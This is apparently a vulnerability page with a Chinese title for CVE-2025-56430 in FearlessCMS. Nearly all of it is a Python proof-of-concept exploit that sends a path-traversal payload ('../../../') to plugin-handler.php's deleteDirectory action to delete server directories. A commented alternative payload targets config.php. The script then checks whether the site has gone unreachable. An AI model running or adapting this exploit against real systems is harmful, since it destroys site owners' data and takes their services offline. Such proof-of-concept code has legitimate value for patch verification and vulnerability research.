CVE-2025-56430 FearlessCMS plugin-handler.php目录遍历拒绝服务漏洞

import requests import urllib.parse # CVE-2025-56430 PoC - FearlessCMS Directory Traversal DoS # Target: FearlessCMS v.0.0.2-15 # Vulnerability: plugin-handler.php deleteDirectory function TARGET_URL = "http://target.com/plugin-handler.php" def exploit_directory_traversal(): """ Exploit directory traversal in FearlessCMS plugin-handler.php The deleteDirectory function does not properly validate path input, allowing attackers to delete arbitrary directories via path traversal. """ # Payload to delete parent directory using path traversal # This will attempt to delete the parent directory of the web root traversal_payload = "../../../" # Alternative: Delete specific critical files # config_payload = "../../config.php" params = { 'action': 'deleteDirectory', 'path': traversal_payload } try: print(f"[*] Sending exploit request to {TARGET_URL}") print(f"[*] Payload: {traversal_payload}") # GET request (may vary based on implementation) response = requests.get(TARGET_URL, params=params, timeout=10) print(f"[*] Status Code: {response.status_code}") print(f"[*] Response: {response.text[:500]}") if response.status_code == 200: print("[+] Exploit sent successfully - Directory deletion triggered") else: print("[-] Exploit may have failed - Check manually") except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") def post_exploitation_check(): """ Check if the web application is still accessible """ check_urls = [ "http://target.com/index.php", "http://target.com/admin/", "http://target.com/" ] for url in check_urls: try: response = requests.get(url, timeout=5) print(f"[*] {url} - Status: {response.status_code}") except: print(f"[!] {url} - Unreachable (DoS successful)") if __name__ == "__main__": print("=" * 60) print("CVE-2025-56430 PoC - FearlessCMS Directory Traversal") print("=" * 60) exploit_directory_traversal() print("\n[*] Checking application availability...") post_exploitation_check()